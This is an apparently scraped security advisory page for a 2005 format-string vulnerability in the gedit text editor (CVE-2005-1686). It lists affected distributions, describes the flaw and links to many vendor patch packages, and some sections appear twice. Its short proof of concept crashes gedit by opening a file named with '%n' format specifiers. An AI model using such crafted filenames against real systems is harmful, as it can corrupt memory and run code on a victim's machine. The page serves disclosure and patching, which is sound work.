Gedit Filename Format String Vulnerability
BID:13699
Info
Gedit Filename Format String Vulnerability
| Bugtraq ID: | 13699 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1686 |
| Remote: | Yes |
| Local: | No |
| Published: | May 30 2005 12:00AM |
| Updated: | Apr 19 2011 08:54PM |
| Credit: | Discovery of this issue is credited to jsk:exworm (www.0xbadexworm.org). |
| Vulnerable: |
Turbolinux Turbolinux Desktop 10.0 Turbolinux Turbolinux 10 F... Turbolinux Home Sun Solaris 10_x86 Sun Solaris 10_sparc SGI ProPack 3.0 SGI Advanced Linux Environment 3.0 RedHat Enterprise Linux WS 4 RedHat Enterprise Linux WS 3 RedHat Enterprise Linux ES 4 RedHat Enterprise Linux ES 3 RedHat Enterprise Linux AS 4 RedHat Enterprise Linux AS 3 RedHat Enterprise Linux Desktop version 4 RedHat Desktop 4.0 RedHat Desktop 3.0 MandrakeSoft Linux Mandrake 10.2 x86_64 MandrakeSoft Linux Mandrake 10.2 MandrakeSoft Linux Mandrake 10.1 x86_64 MandrakeSoft Linux Mandrake 10.1 MandrakeSoft Corporate Server 3.0 x86_64 MandrakeSoft Corporate Server 3.0 ImageMagick ImageMagick 5.4.3 GNOME gEdit 2.10.2 GNOME gEdit 2.8.3 GNOME gEdit 2.8.1 GNOME gEdit 2.2 .0 GNOME gEdit 2.0.2 |
| Not Vulnerable: | |
Discussion
Gedit Filename Format String Vulnerability
gEdit is prone to a format-string vulnerability. Exploitation may occur when the program is invoked with a filename that includes malicious format specifiers.
Attackers could exploit this issue to corrupt arbitrary regions of memory with attacker-supplied data, potentially resulting in the execution of arbitrary code in the context of the user running the program.
gEdit is prone to a format-string vulnerability. Exploitation may occur when the program is invoked with a filename that includes malicious format specifiers.
Attackers could exploit this issue to corrupt arbitrary regions of memory with attacker-supplied data, potentially resulting in the execution of arbitrary code in the context of the user running the program.
Exploit / POC
Gedit Filename Format String Vulnerability
The following example is available:
bash-2.05b#cat fmtexp.c
#include <stdio.h>
int
main()
{
printf("hah gedit\n");
}
bash-2.05b#gcc -o fk fmtexp.c
bash-2.05b#mv fk AA%n%n%n.c
bash-2.05b#gedit AA%n%n%n.c
The following example is available:
bash-2.05b#cat fmtexp.c
#include <stdio.h>
int
main()
{
printf("hah gedit\n");
}
bash-2.05b#gcc -o fk fmtexp.c
bash-2.05b#mv fk AA%n%n%n.c
bash-2.05b#gedit AA%n%n%n.c
Solution / Fix
Gedit Filename Format String Vulnerability
Solution:
Ubuntu has released an advisory (USN-138-1) and fixes to address this issue. Please see the referenced advisory for information on obtaining and applying appropriate fixes.
Turbolinux Home
Turbolinux Turbolinux Desktop 10.0
MandrakeSoft Linux Mandrake 10.1
MandrakeSoft Linux Mandrake 10.1 x86_64
MandrakeSoft Linux Mandrake 10.2 x86_64
MandrakeSoft Linux Mandrake 10.2
GNOME gEdit 2.10.2
GNOME gEdit 2.8.1
GNOME gEdit 2.8.3
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
Solution:
Ubuntu has released an advisory (USN-138-1) and fixes to address this issue. Please see the referenced advisory for information on obtaining and applying appropriate fixes.
Turbolinux Home
-
Turbolinux gedit-2.4.1-6.i586.rpm
Turbolinux 10 Desktop, Turbolinux 10 F..., Turbolinux Home
ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Desktop/10/u pdates/RPMS/gedit-2.4.1-6.i586.rpm
Turbolinux Turbolinux Desktop 10.0
-
Turbolinux gedit-2.4.1-6.i586.rpm
Turbolinux 10 Desktop, Turbolinux 10 F..., Turbolinux Home
ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Desktop/10/u pdates/RPMS/gedit-2.4.1-6.i586.rpm
MandrakeSoft Linux Mandrake 10.1
-
Mandriva gedit-2.6.2-4.2.101mdk.i586.rpm
Mandrakelinux 10.1:
http://www.mandriva.com/en/download -
Mandriva gedit-devel-2.6.2-4.2.101mdk.i586.rpm
Mandrakelinux 10.1:
http://www.mandriva.com/en/download -
Mandriva gedit-2.6.2-4.2.101mdk.src.rpm
Mandrakelinux 10.1:
http://www.mandriva.com/en/download
MandrakeSoft Linux Mandrake 10.1 x86_64
-
Mandriva gedit-2.6.2-4.2.101mdk.x86_64.rpm
Mandrakelinux 10.1/X86_64:
http://www.mandriva.com/en/download -
Mandriva gedit-2.6.2-4.2.101mdk.src.rpm
Mandrakelinux 10.1/X86_64:
http://www.mandriva.com/en/download -
Mandriva gedit-devel-2.6.2-4.2.101mdk.x86_64.rpm
Mandrakelinux 10.1/X86_64:
http://www.mandriva.com/en/download
MandrakeSoft Linux Mandrake 10.2 x86_64
-
Mandriva gedit-devel-2.8.3-1.1.102mdk.x86_64.rpm
Mandrakelinux 10.2/X86_64:
http://www.mandriva.com/en/download -
Mandriva gedit-2.8.3-1.1.102mdk.src.rpm
Mandrakelinux 10.2/X86_64:
http://www.mandriva.com/en/download -
Mandriva gedit-2.8.3-1.1.102mdk.x86_64.rpm
Mandrakelinux 10.2/X86_64:
http://www.mandriva.com/en/download
MandrakeSoft Linux Mandrake 10.2
-
Mandriva gedit-2.8.3-1.1.102mdk.src.rpm
Mandrakelinux 10.2:
http://www.mandriva.com/en/download -
Mandriva gedit-2.8.3-1.1.102mdk.i586.rpm
Mandrakelinux 10.2:
http://www.mandriva.com/en/download -
Mandriva gedit-devel-2.8.3-1.1.102mdk.i586.rpm
Mandrakelinux 10.2:
http://www.mandriva.com/en/download
GNOME gEdit 2.10.2
-
Ubuntu gedit_2.10.2-0ubuntu2_amd64.deb
Ubuntu 5.04 (Hoary Hedgehog)
http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubun tu2_amd64.deb -
Ubuntu gedit-dev_2.10.2-0ubuntu2_all.deb
Ubuntu 5.04 (Hoary Hedgehog)
http://security.ubuntu.com/ubuntu/pool/universe/g/gedit/gedit-dev_2.10 .2-0ubuntu2_all.deb -
Ubuntu gedit_2.10.2-0ubuntu2_i386.deb
Ubuntu 5.04 (Hoary Hedgehog)
http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubun tu2_i386.deb -
Ubuntu gedit-common_2.10.2-0ubuntu2_all.deb
Ubuntu 5.04 (Hoary Hedgehog)
http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit-common_2.10. 2-0ubuntu2_all.deb -
Ubuntu gedit_2.10.2-0ubuntu2_powerpc.deb
Ubuntu 5.04 (Hoary Hedgehog)
http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubun tu2_powerpc.deb
GNOME gEdit 2.8.1
-
Ubuntu gedit_2.8.1-0ubuntu1.1_i386.deb
Ubuntu 4.10 (Warty Warthog)
http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubunt u1.1_i386.deb -
Ubuntu gedit-common_2.8.1-0ubuntu1.1_all.deb
Ubuntu 4.10 (Warty Warthog)
http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit-common_2.8.1 -0ubuntu1.1_all.deb -
Ubuntu gedit_2.8.1-0ubuntu1.1_powerpc.deb
Ubuntu 4.10 (Warty Warthog)
http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubunt u1.1_powerpc.deb -
Ubuntu gedit_2.8.1-0ubuntu1.1_amd64.deb
Ubuntu 4.10 (Warty Warthog)
http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubunt u1.1_amd64.deb
GNOME gEdit 2.8.3
-
Debian gedit_2.8.3-4sarge1_sparc.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_sparc.deb -
Debian gedit_2.8.3-4sarge1_amd64.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_amd64.deb -
Debian gedit_2.8.3-4sarge1_mipsel.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_mipsel.deb -
Debian gedit_2.8.3-4sarge1_s390.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_s390.deb -
Debian gedit_2.8.3-4sarge1_ia64.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_ia64.deb -
Debian gedit_2.8.3-4sarge1_i386.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_i386.deb -
Debian gedit_2.8.3-4sarge1_hppa.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_hppa.deb -
Debian gedit_2.8.3-4sarge1_alpha.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_alpha.deb -
Debian gedit_2.8.3-4sarge1_m68k.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_m68k.deb -
Debian gedit-common_2.8.3-4sarge1_all.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit-common_2.8. 3-4sarge1_all.deb -
Debian gedit-dev_2.8.3-4sarge1_all.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit-dev_2.8.3-4 sarge1_all.deb -
Debian gedit_2.8.3-4sarge1_powerpc.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_powerpc.deb -
Debian gedit_2.8.3-4sarge1_mips.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_mips.deb -
Debian gedit_2.8.3-4sarge1_arm.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/g/gedit/gedit_2.8.3-4sarg e1_arm.deb
MandrakeSoft Corporate Server 3.0 x86_64
-
Mandriva gedit-2.4.1-7.2.C30mdk.x86_64.rpm
Corporate 3.0/X86_64:
http://www.mandriva.com/en/download -
Mandriva gedit-2.4.1-7.2.C30mdk.src.rpm
Corporate 3.0/X86_64:
http://www.mandriva.com/en/download
MandrakeSoft Corporate Server 3.0
-
Mandriva gedit-2.4.1-7.2.C30mdk.src.rpm
Corporate 3.0:
http://www.mandriva.com/en/download -
Mandriva gedit-2.4.1-7.2.C30mdk.i586.rpm
Corporate 3.0:
http://www.mandriva.com/en/download
References
Gedit Filename Format String Vulnerability
References:
References:
- CVE-2005-1686 Format String Vulnerability in Gedit Gnome text editor (Oracle)
- gEdit Homepage (GNOME)
- ImageMagick Homepage (ImageMagick)
- RHSA-2005:499-05 - gedit security update (RedHat)
- ImageMagick's Overflow (Angelo Rosiello
) - pst.advisory: gedit fun. opensource is god .lol windows (yan feng
)